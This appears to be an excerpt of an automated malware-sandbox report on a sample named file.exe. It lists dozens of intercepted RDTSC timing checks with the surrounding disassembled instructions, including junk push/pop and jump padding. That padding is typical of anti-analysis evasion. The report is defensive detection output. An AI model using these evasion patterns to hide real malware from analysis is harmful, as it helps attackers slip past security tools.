                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA924 second address: AEA930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA930 second address: AEA960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C86h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0B44EA8C7Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA960 second address: AEA966 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA966 second address: AEA96C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAAAB second address: AEAAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAC11 second address: AEAC26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAC26 second address: AEAC3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ADh 0x00000007 je 00007F0B44BD79B2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAC3D second address: AEAC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEAC43 second address: AEAC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0B44BD79ADh 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2D9B second address: AF2D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2D9F second address: AF2DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B44BD79AFh 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F0B44BD79AEh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2DCE second address: AF2DE7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0B44EA8C80h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0F55 second address: AF0F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0F59 second address: AF0F7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F0B44EA8C76h 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f push eax 0x00000010 js 00007F0B44EA8C78h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c jp 00007F0B44EA8C76h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1389 second address: AF138D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF138D second address: AF1393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1393 second address: AF1399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1399 second address: AF13A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF167E second address: AF16A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 jns 00007F0B44BD79B2h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F0B44BD79ABh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF17ED second address: AF17F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1C58 second address: AF1C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0B44BD79B7h 0x0000000f jmp 00007F0B44BD79B1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF1DBF second address: AF1DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F0B44EA8C7Ah 0x0000000b jmp 00007F0B44EA8C80h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0ADC second address: AF0AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F0B44BD79A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0AE8 second address: AF0B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C87h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F0B44EA8C89h 0x00000011 jg 00007F0B44EA8C76h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF0B2C second address: AF0B4C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007F0B44BD79A6h 0x00000014 pop esi 0x00000015 jmp 00007F0B44BD79ABh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFAEDC second address: AFAEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFAEE5 second address: AFAF06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0B44BD79B0h 0x0000000e push edx 0x0000000f jns 00007F0B44BD79A6h 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0145A second address: B0146F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ah 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A43607 second address: A4360C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4360C second address: A43616 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44EA8C8Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B09979 second address: B09980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B096B7 second address: B096C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0B44EA8C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B096C3 second address: B096E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 js 00007F0B44BD79A6h 0x0000000e jc 00007F0B44BD79A6h 0x00000014 popad 0x00000015 push ebx 0x00000016 jo 00007F0B44BD79A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E04D second address: B0E09A instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B44EA8C7Eh 0x00000008 jno 00007F0B44EA8C76h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 je 00007F0B44EA8CB7h 0x00000018 pushad 0x00000019 jmp 00007F0B44EA8C86h 0x0000001e push eax 0x0000001f pop eax 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F0B44EA8C87h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0E09A second address: B0E0A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15246 second address: B15252 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B44EA8C76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B15252 second address: B15256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D33C second address: B1D35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C83h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jc 00007F0B44EA8C76h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D35E second address: B1D364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D15D second address: B1D183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0B44EA8C76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007F0B44EA8C7Bh 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D183 second address: B1D195 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D195 second address: B1D1B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0B44EA8C89h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1D1B9 second address: B1D1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23302 second address: B23316 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0B44EA8C78h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23316 second address: B2331C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239C9 second address: B239DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239DF second address: B239E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239E5 second address: B239E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B239E9 second address: B23A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B44BD79A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B44BD79B6h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A0F second address: B23A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B23A13 second address: B23A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24605 second address: B2460B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2460B second address: B24633 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44BD79BEh 0x00000008 jmp 00007F0B44BD79B8h 0x0000000d jo 00007F0B44BD79ACh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28BEE second address: B28C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F0B44EA8C82h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28C07 second address: B28C18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ABh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B28C18 second address: B28C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DA5 second address: B30DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B44BD79ACh 0x0000000a je 00007F0B44BD79A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DB5 second address: B30DC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0B44EA8C76h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30DC1 second address: B30E00 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B44BD79A6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f jnl 00007F0B44BD79A6h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F0B44BD79ADh 0x00000020 jmp 00007F0B44BD79B7h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30E00 second address: B30E0A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44EA8C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B35B14 second address: B35B6E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F0B44BD79AEh 0x00000010 jbe 00007F0B44BD79A6h 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b js 00007F0B44BD79C7h 0x00000021 jmp 00007F0B44BD79AAh 0x00000026 jmp 00007F0B44BD79B7h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F0B44BD79ABh 0x00000032 push edx 0x00000033 pop edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D85 second address: B43D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D89 second address: B43D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D8D second address: B43D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43D95 second address: B43DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F0B44BD79A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43DA1 second address: B43DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43DBD second address: B43DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43C66 second address: B43C70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B467FE second address: B46802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B463AE second address: B463BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B464FF second address: B46522 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44BD79A6h 0x00000008 jmp 00007F0B44BD79AAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F0B44BD79AFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46522 second address: B46529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46529 second address: B4652F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4652F second address: B46572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007F0B44EA8C87h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 pushad 0x00000014 jmp 00007F0B44EA8C85h 0x00000019 ja 00007F0B44EA8C76h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5512E second address: B55133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B553E6 second address: B5540B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B44EA8C83h 0x00000011 jp 00007F0B44EA8C76h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5540B second address: B55415 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55415 second address: B5541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55B29 second address: B55B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnp 00007F0B44BD79A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55DC9 second address: B55DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B57946 second address: B57956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79AAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591F2 second address: B591F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591F6 second address: B591FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B591FF second address: B59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59205 second address: B59239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B4h 0x00000009 jo 00007F0B44BD79A6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0B44BD79B1h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59239 second address: B5923D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59098 second address: B590B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F0B44BD79B1h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A891 second address: B5A8AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B44EA8C7Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A8AA second address: B5A8AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D136 second address: B5D140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D140 second address: B5D145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F00B second address: B5F02B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C76h 0x00000008 jo 00007F0B44EA8C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F0B44EA8C7Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5F02B second address: B5F02F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
